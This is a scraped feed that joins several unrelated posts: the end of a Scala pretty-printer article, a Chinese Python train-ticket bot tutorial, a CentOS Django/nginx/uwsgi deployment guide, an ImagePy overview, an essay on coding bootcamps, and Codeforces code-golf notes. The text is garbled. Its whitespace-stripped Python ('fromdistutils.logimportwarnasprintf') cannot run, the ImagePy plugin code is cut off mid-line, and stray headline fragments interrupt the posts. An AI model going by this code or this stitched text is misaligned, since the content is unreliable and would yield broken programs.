width: 0 { "person1": { "name": "Alive", "favoriteColors": [ "red", "green", "blue" ] }, "person2": { "name": "Bob", "favoriteColors": [ "cyan", "magenta", "yellow", "black" ] } } width: 48 { "person1": { "name": "Alive", "favoriteColors": ["red","green","blue"] }, "person2": { "name": "Bob", "favoriteColors": [ "cyan", "magenta", "yellow", "black" ] } } width: 61 { "person1": { "name": "Alive", "favoriteColors": ["red","green","blue"] }, "person2": { "name": "Bob", "favoriteColors": ["cyan","magenta","yellow","black"] } } width: 74 { "person1": {"name": "Alive","favoriteColors": ["red","green","blue"]}, "person2": { "name": "Bob", "favoriteColors": ["cyan","magenta","yellow","black"] } } width: 84 { "person1": {"name": "Alive","favoriteColors": ["red","green","blue"]}, "person2": {"name": "Bob","favoriteColors": ["cyan","magenta","yellow","black"]} } width: 152 {"person1": {"name": "Alive","favoriteColors": ["red","green","blue"]},"person2": {"name": "Bob","favoriteColors": ["cyan","magenta","yellow","black"]}}

You can copy-paste the code snippets above into any Scala program, or Scala REPL , and should see the output as shown above.

Analysis

Earlier, we claimed the following properties of our pretty-printing algorithm:

Peak heap usage linear in the width of the output window The ability to start and stop the pretty-printing to print any portion of it, with total runtime linear in the portion of the structure printed.

Let us look at these in turn.

Heap Usage Our recurse function walks over the Tree structure in order to return the pretty-printed Iterator[String] . One thing of note is that the Tree nodes are "lazy": Nested contains an iterator of children, not a concrete array of children, and so at no point is the entire tree materialized at the same time.

At any point in time, there are a number of recurse calls on the stack linear in the depth of the tree we're printing (if it's roughly balanced, that means roughly O(log n) the total tree size). Within each of those recurse calls, we buffer up some number of chunks: however, the total number of buffered chunks by all calls in the call-stack cannot exceed the maxWidth value, since each call subtracts the width of it's prefix whenever it recurses into a child.

Note that siblings in the Tree each have separate buffers, which each can be up to maxWidth in size. However, as siblings they are never active on the call stack at the same time: the first sibling's returned Iterator[String] must be exhausted before the second sibling starts evaluating, so the peak heap usage is still limited by maxWidth .

Strictly speaking, the total heap usage is O(max-width + tree-depth + biggest-literal) . This is much better than algorithms that involve materializing the entire O(size-of-tree) data structure in memory to manipulate.

Start-Stop, Linear Runtime Since the output of prettyprint is an Iterator[String] , we can choose to consume as much or as little of the output as we want, resulting in a corresponding amount of computation happening. We do not need to wait for the entire pretty-printing to complete before we start receiving chunks.

Because we do not construct the entire pretty-printed output up-front, we also do not need to pay for the portions of the Tree structure that we did not print! This means that prettyprint ing the first few lines of a huge data structure is very fast, where-as calling a .toString that materializes the whole output in memory could easily take a long time.

Conclusion

The key insight behind this prettyprint algorithm is that for this common kind of indentation-based mixed horizontal/vertical layout, you can make layout decisions in a streaming fashion with only a bounded amount of buffering:

When you need buffer all of a child's chunks, it is to verify that a child can fit on one line, and thus buffering everything is cheap.

When a child's output is very large, we can make that determination after buffering at most one line of chunks, so that is cheap as well.

This gives the pretty-printer very predictable runtime characteristics, and allows it to be used in a streaming fashion on very large data structures without accumulating a corresponding very-large-string in memory.

The described prettyprint algorithm is currently being used in my ScalaPPrint library, though extended in a few incidental ways (colored output, infix nodes, etc.). It is also used to display values in the Ammonite Scala REPL , and I have used it to prettyprint huge data-structures. Both the quality of pretty-printed output and convenient runtime characteristics behave exactly as described.

This blog post extracts the core pretty-printing algorithm, separates it out from all the incidental concerns and documents it it for posterity. While the initial goal was to pretty-print sourcecode representations of Scala data structures, this blog post demonstrates how the core pretty-printing algorithm can be applied to any hierarchical data formats comprised of (1) terminal nodes with a plain string representation and (2) nested nodes, with a prefix, suffix, and a list of children with separators. This means simple formats like JSON or the subset of Python shown are trivially supported, while the core algorithm can be easily extended with additional Tree subclasses to support additional syntax such as infix operators, bin-packed lists, vertical-aligned indentation, or other constructs.

About the Author: Haoyi is a software engineer, an early contributor to Scala.js , and the author of many open-source Scala tools such as theAmmonite REPL and FastParse .

If you've enjoyed this blog, or enjoyed using Haoyi's other open source libraries, please chip in (or get your Company to chip in!) via Patreon so he can continue his open-source work

春运渡劫?Python帮你12306抢回家的火车票

$
0
0
前言

年味越来越淡,但我对过年的期待一直没变。为了理想,离开家乡。这一路,背上行囊,穿过人潮,千里迢迢。疲惫也好,激动也罢,总有家乡值得牵挂。

春节是孟浩然“昨夜斗回北,今朝岁起东”的唏嘘,不仅感叹于“田家占气候,共说此年丰”的蹉跎岁月,更多感伤于这一年下来的“无禄尚忧农”自我调侃的碌碌无为;春节是董必武“共庆新年笑语哗,红岩士女赠梅花”的对新年的期待,也有“举杯互敬屠苏酒,散席分尝胜利茶。只有精忠能报国,更无乐土可为家。”的伟大抱负。

但是,所有的乡愁和感伤,最好的解药就是一张火车票。每当万事俱备,总是只欠东风,我依然是被一张5mm厚的火车票拦在了门外。隐隐约约在我眼前出现,然后又悄无声息的走掉,说的就是你,我花钱加速都抢不到的火车票。

大学四年以接近尾声,遗憾于爱情的“你好我爱你,再见,对不起”。这种遗憾经过反复斟酌和推敲,有那么一刻,我感觉你我之间的距离就是那张“近在眼前,远在天边”可望而不可及的火车票。

由于乡愁泛滥成灾、爱情糜烂至极、友情西辞黄鹤,所以阿广今天教大家如果用python抢火车票!解决你的乡情、爱情、友情,说不定还有基情?

数据介绍

12306官方部分数据如下:


春运渡劫?Python帮你12306抢回家的火车票
实现过程

注:具有自然语言识别处理功能

(1)加载头文件 fromdistutils.logimportwarnasprintf importsys frombosonnlpimportBosonNLP importyaml fromos.pathimportexpanduser importos importcollections importsubprocess importdatetime (2)加载配置文件 home=expanduser("~") withopen(os.path.join(home,".ibot.yml"))asf: config=yaml.load(f) bosonnlp_token=config["token"] (3)解析字符串 defparse(self,query_string): """ input: 1月12号济南到兖州的高铁票 output: [{'entity':[[0,3,'time'],[3,4,'location'],[5,6,'location']],#需要理解实体出现的模式,这块需要理解上下文 'tag':['t','m','q','ns','p','ns','ude','n','n'], 'word':['1月','12','号','济南','到','兖州','的','硬座','票']}] """ result=self.nlp.ner(query_string)[0] words=result['word'] tags=result['tag'] entities=result['entity'] return(words,entities,tags) (4)获得已识别的实体 defget_entity(self,parsed_words,index_tuple): """ 获取已识别的实体 采用filter 参考pythoncookbook部分 input: entities:二元组 parsed_words:解析好的词组 """ returnparsed_words[index_tuple[0]:index_tuple[1]] (5)元组重新命名 defformat_entities(self,entities): """ 给元组命名 """ namedentity=collections.namedtuple('namedentity','index_beginindex_endentity_name') return[namedentity(entity[0],entity[1],entity[2])forentityinentities] (6)获取解析时间戳 defget_format_time(self,time_entity): """ output {'timestamp':'2018-12-2023:30:29','type':'timestamp'} """ basetime=datetime.datetime.today() result=self.nlp.convert_time( time_entity, basetime) #print(result) timestamp=result["timestamp"] returntimestamp.split("")[0]

https://github.com/zandaoguang/MissHome

如何调用? iquery济南兖州20190112 ibot本周天从济南回老家兖州,帮我看下 ibot本周五从兖州出发,打算去北京捡垃圾,帮我看下有没有车票 ib这周六从南京回武夷山老家,帮我看下车票 ... 查询结果并抢票
春运渡劫?Python帮你12306抢回家的火车票
阿广说

自从学了计算机,每逢思乡之情冉冉升起,只能通过加快敲击键盘的速度来忘记此时此刻的烽火三月、家书万金。

盼望着,盼望着,寒假来了,春天的脚步近了。在我们童颜尚驻时,过年缺少不了的部门就是走亲戚,有鱼肉之果腹,亦有无案牍之劳形。可后来的后来,我们长大了,走亲戚在无形之中成了一种“烦恼”。

我们累于东家跑西家蹿;我们累于各类繁文缛节;我们累于各式尬聊;我们累于招呼熊孩子;我们累于送礼送红包;我们累于各种解释;我们累于被明里奚落、暗里鄙视;我们累于装体面、撑面子。


春运渡劫?Python帮你12306抢回家的火车票

明明生活不止眼前的苟且,还有往后余生的苟且,可碍于面子,我们依然装作不但有诗和远方,还要有钱途的样子。


春运渡劫?Python帮你12306抢回家的火车票

如果把过年比作爱情,那岂是:长街长,烟花繁,你挑灯回看;短亭短,红尘辗,我把萧再叹?通俗点讲,我愿用三生烟火,换你一张通往家乡的火车票。

Centos部署 django 服务 nginx uwsgi

$
0
0
1.安装python3 yum -y install wget gcc make zlib-devel readline-devel bzip2-devel ncurses-devel sqlite-devel gdbm-devel xz-devel tk-devel openssl-devel wget https://www.python.org/ftp/python/3.6.1/Python-3.6.1.tar.xz xz -d Python-3.6.1.tar.xz tar -xvf Python-3.6.1.tar cd Python-3.6.1 ./configure --prefix=/usr/local/python3.6 --enable-optimizations make make install ln -s /usr/local/python3.6/bin/python3 /usr/bin/python3 ln -s /usr/local/python3.6/bin/pip3 /usr/bin/pip3

这是通过编译的方式来安装的

输入 python3 version 和 pip3 version 进行测试

2. 安装nginx sudo rpm -Uvh http://nginx.org/packages/centos/7/noarch/RPMS/nginx-release-centos-7-0.el7.ngx.noarch.rpm sudo yum install -y nginx sudo systemctl start nginx.service

通过你的域名或IP来访问你的Web页面来预览一下Nginx的默认页面进行测试

3.下载代码,上传到服务器的/var/www 目录 4. 安装依赖 pip3 install django pip3 install uwsgi ln -s /usr/local/python3/bin/uwsgi /usr/bin/uwsgi3 5. 独立运行进行测试 cd /var/www/dexundjango python3 manage.py runserver 0.0.0.0:8014

测试通过后,Ctrl + C 停止运行

6.uwsgi sudo mkdir -p /etc/uwsgi/sites sudo mkdir -p /var/log/uwsgi cd /etc/uwsgi/sites sudo vi /etc/uwsgi/sites/mysite.ini [uwsgi] socket = 127.0.0.1:10000 chdir=/var/www/dexundjango module=mysite.wsgi:application master=True pidfile=/tmp/project-master.pid vacuum=True max-requests=5000 daemonize=/var/log/uwsgi/mysite.log 7. nginx 配置 vi /usr/local/nginx/conf/nginx.conf (根据本地的配置路径) find / -name uwsgi_params 来替换下面的uwsgi_params路径 server { listen 8014; #暴露给外部访问的端口 server_name localhost; charset utf-8; location / { include /usr/local/nginx/conf/uwsgi_params; uwsgi_pass 127.0.0.1:10000; # 必须和uwsgi.ini配置的端口一致 } location /static/ { alias /home/www/dexundjango/trade/static/; #项目静态路径设置 } 8. 启动uwsgi uwsgi3 --ini /etc/uwsgi/sites/mysite.ini 9. 开机启动uwsgi vi /etc/init.d/uwsgi #!/bin/bash # chkconfig: - 85 15 uwsgi=/usr/bin/uwsgi3 api_conf=/etc/uwsgi/sites/mysite.ini case $1 in start) echo -n "Starting uWsgi" nohup $uwsgi -i $api_conf >/var/log/uwsgi/project-api.log 2>&1 & echo " done" ;; stop) echo -n "Stopping uWsgi" killall -9 uwsgi echo " done" ;; restart) $0 stop $0 start ;; show) ps -ef|grep uwsgi ;; *) echo -n "Usage: $0 {start|restart|stop|show}" ;; esac chmod +x /etc/init.d/uwsgi chkconfig --add uwsgi chkconfig uwsgi on

5235

ImagePy――UI界面支持开放插件的Python开源图像处理框架

$
0
0

雷锋网 AI 科技评论按,ImagePy 是一款 python 开源图像处理框架,其 UI 界面支持开放插件。在 github: https://github.com/Image-Py/imagepy 上,不仅有关于这款图像处理软件的详细介绍,还有一些使用示例,雷锋网 (公众号:雷锋网) AI 科技评论接下来将详细介绍这一开源图像处理框架。

ImagePy 是一款基于 imagej 等插件的图像处理框架,它可以与 scipy.ndimage、scikit-image、opencv、simpleitk、mayavi 以及任何基于 numpy 的库进行组合使用,其地址为 http://imagepy.org 。


ImagePy――UI界面支持开放插件的Python开源图像处理框架

简介

ImagePy 是用 python 编写的开源图像处理框架。它的 UI 接口、图像数据结构和表数据结构分别是基于 wxpython、numpy 和 pandas 的。此外,它支持任何基于 numpy 和 pandas 的插件,这些插件可以轻松地在 scipy.ndimage、scikit-image、simpleitk、opencv 和其他图像处理库之间进行通信。


ImagePy――UI界面支持开放插件的Python开源图像处理框架

概览,鼠标测量,几何变换,过滤,分割,计数等


ImagePy――UI界面支持开放插件的Python开源图像处理框架

如果你更喜欢 IJ 样式,请尝试使用「 windows -> Windows Style 」来切换

ImagePy:

具有用户友好的界面;

可以读取/保存各种格式的图像数据;

支持 ROI 设置、绘图、测量和其他鼠标操作;

可以执行图像滤波、形态学操作和其他常规操作;

可以进行图像分割、区域计数、几何测量和密度分析;

能够对从图像中提取的参数进行相关的数据分析、滤波、统计分析等。

这个项目的长期目标是成为 ImageJ 和 SPSS 的联合体。

地址:

https://academic.oup.com/bioinformatics/article-abstract/34/18/3238/4989871?redirectedFrom=fulltext

安装:

支持的系统:带有 python2.7 和 python3 及以上版本的 windows、linux、mac 系统。

ImagePy 是一个基于 wxpython 的 ui 框架,它不能在 linux 上用 pip 进行安装。你需要下载和你的 linux 系统相匹配的 whl文件。

因为 ImagePy 会编写一些配置信息,因此,在 linux 和 mac 系统上,可能会存在权限问题,所以请从 sudo 命令开始。如果使用 pip 安装,请按照下面的方法来添加用户参数:pipsinstall--user imagepy。

如果在 anaconda 虚拟环境中安装 ImagePy,那么你可能会遇到这样的错误:这个程序需要屏幕访问权限。请使用 python 构建的框架来运行,并且只有在你已经登录到主显示器上时才这样做,如果遇到这个问题,请从 pythonw-m 镜像开始。

基本操作:

ImagePy 有一组非常丰富的特性,在这里,我们使用一个具体的示例向你展示 ImagePy 的这些特性。我们选择官方使用 scikit-image 来分割硬币的例子,因为这个例子简单而全面。

打开图像

菜单打开:file -> local samples -> coins,来打开 ImagePy 中的示例图像。ps:ImagePy 支持 bmp、jpg、png、gif、tif 和其他常用的文件格式。通过安装 ITK 插件,还可以读取/保存 dicom、nii 和其他格式的医学图像。如果安装了 opencv,还可以读/写 wmv、avi 和其他格式的视频。


ImagePy――UI界面支持开放插件的Python开源图像处理框架

硬币

过滤与分割

选择一个复合滤波器对图像进行 sobel 梯度提取,然后使用上下阈值作为标记,最后在梯度图上进行 watersheds 分割。滤波和分割是图像处理工具包中的关键技术,也是最终测量成败的关键。还支持诸如自适应阈值、watersheds 等分割方法。


ImagePy――UI界面支持开放插件的Python开源图像处理框架

Up And Down Watershed 分割


ImagePy――UI界面支持开放插件的Python开源图像处理框架

掩模

二值化

菜单打开:process -> binary -> binary fill holes

分割后得到的掩模图像比较干净,但仍存在一些空洞和杂质,干扰了计数和测量。ImagePy 支持二进制操作,如腐蚀、膨胀、开环和闭环,以及轮廓提取、中心轴提取和距离转换。


ImagePy――UI界面支持开放插件的Python开源图像处理框架

填洞

几何滤波

菜单打开:analysis -> region analysis -> geometry filter

ImagePy 可以根据面积、周长、拓扑、稳定性和离心率等参数进行几何滤波。还可以使用多个条件进行筛选。每个数字可以是正的(或者负的),这表示所保存的对象的相应参数分别大于(或者小于)相对值。保存的对象将被设置为前色,拒绝的对象将被设置为背景色。在这个演示中,背景颜色设置为 100,以便查看有哪些对象被过滤掉了。一旦对结果满意,就将背景色设置为 0。此外,ImagePy 还支持灰度密度滤波、颜色滤波、颜色聚类等功能。


ImagePy――UI界面支持开放插件的Python开源图像处理框架

几何滤波

几何分析

菜单打开:process -> region analysis -> geometry analysis count,计算面积并分析参数。通过选择 cov 选项,ImagePy 使用通过协方差计算的椭圆拟合每个区域。这里计算前面步骤中所示的参数,如面积、周长、离心率和稳定性。事实上,前一步的滤波正是对这一步的准备。


ImagePy――UI界面支持开放插件的Python开源图像处理框架

几何分析


ImagePy――UI界面支持开放插件的Python开源图像处理框架

生成结果表(背景是黑色,以强调椭圆)

按区域对表进行排序

菜单打开:table -> statistic -> table sort by key

选择主键作为区域,并选择 descend,表将按面积的降序排序。表是除了图像之外的另一项重要数据。从某种意义上来说,很多时候我们需要获得图像的相关信息,然后以表的形式对数据进行后续处理。ImagePy 支持表 I/O(xls、xlsx、csv)、过滤、切片、统计分析、排序等等(右键单击列标题来设置文本颜色、小数精度、行样式等)。


ImagePy――UI界面支持开放插件的Python开源图像处理框架

图表

菜单打开:table -> chart -> hist chart

我们经常需要利用表格数据来绘制一个图表。这里,我们绘制了某个区域和其周边列的直方图。ImagePy 的表可以用于绘制常见的图表,如柱状图、饼图、直方图和散点图(基于 matplotlib)。该图表带有缩放、移动和其他功能,并可以保存为图像。


ImagePy――UI界面支持开放插件的Python开源图像处理框架

直方图

3D 表格

菜单打开:kit3d -> viewer 3d -> 2d surface

图像的表面重建。这幅图像显示了三种方式的重建结果,包括:sobel 梯度图、高阈值和低阈值。它显示了 Up And Down Watershed 是如何工作的:

计算梯度;

通过高低阈值标记硬币和背景;

在 dem 图表上模拟上升 water 来形成分割线。

ImagePy 可以完成图像的 3d 滤波、3d 轮廓构建、3d 拓扑分析、2d 表面重建和 3d 表面可视化。3d 视图可以被自由拖动、旋转,其结果可以保存为.stl 文件。


ImagePy――UI界面支持开放插件的Python开源图像处理框架

3d 可视化

宏记录和执行

菜单打开:window -> develop tool suite

宏记录器显示在开发工具面板中。我们已经手动完成了一个图像的分割。然而,用这种方式一下子处理超过 10 幅图像是非常乏味的。因此,假设在处理这些问题的时候,这些步骤具有高度的可重复性和健壮性,我们可以记录一个宏,以便将几个处理过程组合成一个单击程序。宏记录器与无线电记录器相似。打开后,它将记录操作的每个步骤。我们可以点击暂停按钮停止录制,也可以点击播放按钮开始录制。当宏运行时,所记录的命令将按照顺序执行,因此它具有简单性和可再现性。

宏被保存到 .mc 文件中。将文件拖放到 ImagePy 底部的状态栏中,宏将自动执行。我们还可以将 .mc 文件复制到 ImagePy 文件目录下的菜单的子菜单中。当启动 ImagePy 时,宏文件将被解析为相应位置的菜单项。通过单击菜单,宏将被执行。


ImagePy――UI界面支持开放插件的Python开源图像处理框架

宏记录

Workflow

宏是一系列预定义的命令。通过将一系列固定操作记录到宏中,可以提高工作效率。然而,宏缺乏灵活性。例如,有时主要步骤是固定的,但是参数调优需要人工参与。在这种情况下,workflow 就可以解决这个问题。ImagePy 中的 workflow 是可视化的流程图,分为两个层次:章节和部分。本章对应于 workflow 中的矩形区域,并且该部分是矩形区域中的按钮,也是命令,并附有图形说明。右边的消息窗口将显示相应的功能描述,同时鼠标悬停在上面。单击右上角的“详细文档”,查看整个过程的说明文档。

workflow 实际上是用 MarkDown(一种标记语言)编写的,但是在编写时你需要遵守以下规范:

Title
===== ## Chapter1 1.

Section1

some coment for section1 ...

2. ...

## Chapter 2 ...


ImagePy――UI界面支持开放插件的Python开源图像处理框架
workflow

滤波器插件

在最后一节中,我们介绍了宏和 workflow,使用宏和 workflow 连接现有功能很方便。但有时我们需要创建新的特性。在本节中,我们将尝试向 ImagePy 添加一个新特性。ImagePy 可以轻松访问任何基于 numpy 的函数。让我们以 scikit-image 的 canny 操作符为例。

示例代码如下:

from skimage import feature

from imagepy.core.engine import Filter

class Plugin( Filter ):

title = 'Canny'
note = [ 'all' , 'auto_msk' , 'auto_snap' , 'preview' ]
para = { 'sigma' : 1.0 , 'low_threshold' : 10 , 'high_threshold' : 20 }
view = [ ( float , 'sigma' , ( 0 , 10 ) , 1 , 'sigma' , 'pix' ) ,
( 'slide' , 'low_threshold' , ( 0, 50 ) , 4 , 'low_threshold' ) ,
('slide' , 'high_threshold' , ( 0 , 50 ) , 4 , 'high_threshold' ) ]

def run ( self , ips , snap , img , para = None ) :

return feature.canny (snap , p

只会Python可造不出iPhone

$
0
0

python正成为计算机领域的红人,它的走红不仅仅因为它的简易语言设计和各种方便的调用包,还与各种培训课程中的营销般的吹捧不无关系。

在这些热文的叙述中,似乎学会Python,就能搞定一切计算机难题了。对于这种普及类编程工具和课程,今天的文章可能可以带来一些不一样的看法。

这篇文章的作者Bhavya Kashyap在计算机领域可算是“老司机”,其目前在亚马逊做开发相关的工作,之前雇主是微软以及Facebook。接下来Bhavya Kashyap用她多年的工作经验告诉你,为什么她不喜欢Python和相关培训班,毕竟,iPhone可不是只靠python就造的出来的。

以下,enjoy。

最近我的一位朋友给我讲述了她与一位同事的故事。她的同事是一个好好先生,认识之后,每天都在给她强烈安利编程训练营,称其为工程领域一种新的学位。他自己本来也是编程训练营的获利者,就他所说,这份工作就是自己编程培训的成果,他认为为了计算机去拿一个学位这个事情是多余的。

我的朋友就读于滑铁卢大学的计算机工程专业、并且获得了多伦多大学的工程硕士学位,她对此显然非常不服。
只会Python可造不出iPhone

经过一番思考后,我朋友试图改变他的想法,她详细询问了相关编程训练营是否涉及安全、服务器硬件资源或操作系统相关学习,并试图解释:编程培训班和专业学位学习的区别到底是什么。

编程训练营及其所传递的信息

根据对于编程训练营毕业生的观察,我发现他们有一种荒谬的结论,其中之一就是他们相信web开发和app开发就是整个计算机工程领域的内容。


只会Python可造不出iPhone
编程训练营所教的语言和技能组合

这并不意外。目前的现实就是这样,编码正在成为Web开发的代名词。这个同等性在一些零基础编程训练营,甚至在《纽约时报》等高频出版物中看到。

编程行业正在迅速扩张,但SaaS、设备、安全、系统工程(生产自动驾驶汽车梦寐以求的技术),甚至游戏开发等领域都存在人才匮乏的情况。这极具讽刺意味。从理论上讲,编程训练营是将非技术工人转变为技术工人的一种方式,并且创造熟练劳动力的廉价渠道。工人们纷纷涌向这些训练营,但结果是工人们都偏向于web开发,而计算机科学领域则需要从其他领域努力寻找技术人才。

有人可能会说主动型人才早已明白24周的菜鸟训练营能教给你的只有那么多,但是他们自己知道自己未来的方向和他们的才能所在。但流量是非常必要的,特别是当这种现象如此普遍时。毕竟,流量使得这样的训练营如此畅销。

编程训练营当然是有价值的。对于那些没有能力接受技术教育的人来说,这是他们进入技术领域的一种渠道。对于那些意识到自己太晚加入,甚至只是想多赚一点钱的人来说,也是如此。对于web和移动端开发的诱惑力和即时满足感是可以理解的,尤其是在当前环境下,下载框架和文本编辑器成本很低,却很可能获得大量奖励。这些训练营的美妙之处在于它们可以成为其他类型的开发,工程甚至学术计算机科学的门户。

但是,我只是不知道新学员需要花多久才能进入那些领域。


只会Python可造不出iPhone

编程不等同于计算机科学,也不等同于软件工程或计算机工程,更不等同于STEM(科学、技术、工程和数学的英文首字母缩写)。

虽然它现在很火,已近乎成为计算机科学的代名词。但如果你是一个计算机科学毕业生,你应该知道这两者是不同的,也知道这种等同性对两个学科都是一种伤害。如果你不是从事这方面工作,你可能会想这两者有什么区别。其实这两者的差别不仅在于其所需技能的不同,还在于其根本目标就是不一样的,当然两者也有重合的部分。

编程是战术性的。它是解决眼前问题的过程,并构建某些东西以使其发挥作用。而软件工程则是在此基础上引入战略思维,并应用工程技术,来构建强大且可持续的解决方案。计算机工程包括一定程度的软件工程,但也包含硬件即制作平板电脑、手机和控制台所需的材料。最后,还有计算机科学,在某种程度上,这是最具哲学性的学科,因为其中包括深入研究数学,以及为什么不同类型的算法,数据结构和计算方法的工作方式却相同。

虽然编程训练营对很多人来说是合适的解决方案,但是正规的计算机科学项目所教授的技能和思维模式对于推动技术发展至关重要。这就是为什么从训练营毕业的学生很少有人进入大型科技公司。

需要有能力为公众提供服务,如Google Maps或Waze,它们使用的是 Dijkstra 等算法和MongoDB或Android SDK等工具,他们的用户不可避免地包括编程训练营的参与者。虽然许多菜鸟训练营确实会涉及算法和数据结构,但是它们所覆盖的深度和广度都不够。而且训练营通常是以面试为目的来教授这些,所以教学内容差异很大。


只会Python可造不出iPhone
最好的雇主

对计算机科学专业人员的需求一直在快速增长,并且没有任何消退的迹象。根据Cod.org官方网站收集的数据,全美国范围内开放了570,926 个计算机相关岗位。然而,去年美国国内的计算机科学毕业生人数仅为49,291 。

根据美国劳工统计局的数据, 2016年至2026年间 ,计算机和信息技术的总体就业率预计将增长 13% 。即使计算机科学的毕业率的增长速度能达到同样的比例,绝对数字也必须增加一个完整的数量级才能赶上。 最近的趋势表明有越来越多的学生正在参加计算机科学项目,但仍然不够,还需要做更多工作来缩小差距。

值得庆幸的是, 在过去几年里,越来越多的人注意到了计算机科学(CS)教育的重要性。这很鼓舞人心,但是依然存在类似的问题。

从大多数编程网站的内容来看,人们对“CS”和“STEM”这两个术语的概念产生了混淆。

甚至连computerscience.org官方网站都混淆了这两个术语。网站有一篇文章的标题为“为什么越来越多的女性不愿意从事计算机科学?”文章中表明只有 12% 的工程师为女性。


只会Python可造不出iPhone
至于是哪一种工程师的12%并未说明?

后来工程领域发布的数据则显示女性从业者占“计算机科学相关专业”的25%。但是为什么在专门讨论计算机科学的问题时要突出来自工程领域的数据, 从而混淆事实呢?对专业知识不了解的人来说,这会让他们认为某些术语的意思是一样的。

将CS定位为STEM最具代表性的行业,会把那些想探索这个行业的人引向一个狭窄的领域,这意味着其他的领域会失去很多新员工。当涉及到低级API或系统工程设计等方面,你会惊讶地发现它们是多么具有挑战性。总线设计需要电气工程知识,闪存开发(例如闪存驱动器和手机存储)需要材料科学的知识。我们不要忘记像底盘/外观设计这样的领域,需要工业工程师和设计师来创建像Surfaces,Xboxes和Pixel 3s这样美丽而时尚的外观。一些科技工作者在交流中, 这些话题几乎完全被忽略。

包括我在内的许多专业工程师,都对人们现在高度专注于那些偏向于更高层次的客户端编程的训练营和 CS项目感到不安。这个趋势让人们只关注到了科技的一部分领域,这个行业需要对工程有更深入了解的人, 这样我们周围的空缺才能被填补。如果年轻的大学生甚至是年长的技术人士都不了解它们的可能性,他们就会选择技术阻力最小的那条道路。最终, 工程人才将失去对核心软件工程、土木、机械、网络还有应用程序开发的关注。

向小群体展现STEM梦想

这也是少数人群组织的想法,例如:Women Who Code,Girls Who Code,Black Girls Code等。 这些以少数群体为重点的组织,无论是否无意,都传播了编程为STEM的观点。 他们支持将女性带入科学和工程领域,这种说法之所以成立,只是因为公众对这些领域的看法又被缩小到了代码范围。


只会Python可造不出iPhone

在这种背景下,大部分组织的举措主要就是教授他们脚本和功能性语言。其实对年轻人来说,能大致领略C 和 C++等语言, 这是非常有价值的, 这样能让他们觉得编程语言不是那么的难。冒充者综合症是导致追求 CS学位的少数群体辍学的一个真正因素,所以需要为他们提供帮助来消化这些更难的编程语言, 而将这些编程语言纳入所有CS课程, 可以增强他们学习的信心。

有趣的是,这里我们又说回到了编程训练营,越来越多的少数群体者加入去提升自己的能力,弥补自己的不足。Facebook的广告不断宣传这些举措,这些举措的领导者非常认真的(也许是真诚的)对待学员,但是编程训练营对学员而言最终只起到了非常微弱的作用。这些举措的直接结果尚不清楚――并非所有训练营都公布了学员的就业率,即使他们公布了,某些人也会认为这些举措具有误导性。

显然,除了编程之外,还缺乏很多专业技能训练营,这是因为需要这些技能的公司并没有给训练营助资。

本着乐观的精神,我将假定学员就业率确实很高,训练营的毕业生在离开训练营几个月后就能在初创公司或中型公司找到工作。然后凭借几年的经验,一些人能够跳槽到像谷歌或亚马逊这样的巨头公司中。

但这些少数群体毕业生中的大部分最终并没有担任领导职务, 尤其是在上述巨头公司中。训练营在大部分人的印象中已经与能力弱画上等号,拥有训练营证书的人有时甚至会被剥夺参加某些MFAANG面试的资格(MFAANG是Microsoft, Facebook, Amazon, Apple, Netflix和Google.的缩写)。

我听说同行们在简历上对拥有这类证书的少数群体候选人的资历提出了激烈的质疑。不幸的是, 这就是目前的状况。因此,只有拿到正式的STEM学位,少数群体人才的实力才能得到正视。当然,如何才能得到STEM学位又要另外花费一番功夫了。


只会Python可造不出iPhone
Techgirlz涵盖了应用工程和理论工程

向少数群体引入CS是第一步,同时我们也需要让工程学科多样化。无论在大公司还是小公司中,在所有的领域中,我们都需要妇女、有色人种和其他少数群体的加入。这不仅仅能提高行业水平,为顾客带来好的产品,这也是增强社会和社会经济能力的一个步骤。

下一步应该如何?
只会Python可造不出iPhone

我已经表明了我的忧虑,但问题都没有解决。负责教授给学员所有可能会用到的知识是谁的职责呢?

显然,除了编程之外,还缺乏很多专业技能训练营,这是因为需要这些技能的公司并没有为训练营提供资金支持。虽然编程训练营和一般CS项目举措是这个教育计划的一部分,实际上它们已经做了很多工作,为很多人打开了大门。他们没有义务扩大学员的知识基础去涵盖所有的专业领域,虽然他们这样做也是应该的。

我的结论仍是, 信息传递很重要。

作为一个行业, 我们不能继续只重视Web/app开发和高级CS。我们应当做得更好, 以便满足对科学、技术和工程角色的需求。我们需要新的人才来设计操作系统、主板、相机、屏幕、机箱、装配线和服务器来推动行业技术的更新。毕竟, 你不能仅仅用 Python就做出一部 iPhone。

相关报道: https://medium.com/s/story/you-cant-build-an-iphone-with-python-ad690e5b2164


codeforces April fool contest 2018

$
0
0

提示:这篇文章的主题是code-golf(即写出尽可能短的代码),使用的语言是python 2。这篇文章含有cf April Fool contest 2018的剧透。

(除草。。还没更完,看心情更。。

B. A Map of the Cat

python3好像不用flush,所以用了python3。第一发107B,只排到了第四

i=0;exec("print(i);i+=1;x=input()\nif x!='no':print('grumpy'if x[-2:]in'lenuseay'else'normal');quit()\n"*7)

好像换了个写法之后少了3B,但还是第四>_>

i=0;
while 1:
print(i);i+=1;x=input()[-2:]
if x!='no':print(['normal','grumpy'][x in'lenuseay']);break 发现了一个全新的写法: [print(i)or input()==xxx for i in range(6)] ,只有87B了。。怎么还是第四?前何怪? print(['normal','grumpy'][any([print(i)or input()[-2:]in'lenuseay'for i in range(6)])])

接着又砍了两个字节( lenuseay 中的 ay )。。

print(['normal','grumpy'][any([print(i)or input()[-2:]in'lenuse'for i in range(6)])])

发现排到第三了。。就把第四打开看了一下。。

卧槽他怎么只询问了9啊。。?!

好像是因为数据中9回答no的都是normal。。
codeforces April fool contest 2018

行吧行吧。。

print(9);print(['normal','grumpy'][input()[-2:]in'lenuseay'])

轻松第一啊?

C. Ravioli Sort

显然判断初始数列中相邻数的差是不是不超过$1$即可

n=input();l=map(int,raw_input().split());print["YES","NO"][any([1 for i in range(n-1)if abs(l[i]-l[i+1])>1])]

110B居然能拿python第一,全cf第二?(注:提交的版本是110B,上面版本是109B

学了 zip ,但是 max 不接受空列表,所以下面的代码在$n=1$时gg了

input();l=map(int,raw_input().split());print["YES","NO"][max([abs(x-y)for x,y in zip(l[1:],l[:-1])])>1]

但不需要$n$还是可以省一个字节

input();l=map(int,raw_input().split());print["YES","NO"][any([1 for x,y in zip(l[1:],l[:-1])if abs(x-y)>1])]

好像 zip 不需要两个list的长度相同

input();l=map(int,raw_input().split());print["YES","NO"][any([1 for x,y in zip(l,l[1:])if abs(x-y)>1])]

好像可以把 abs(x-y)<=1 改写成 x-2<y<x+2 ,然后用 all 来缩代码。。?不超过100B了呢

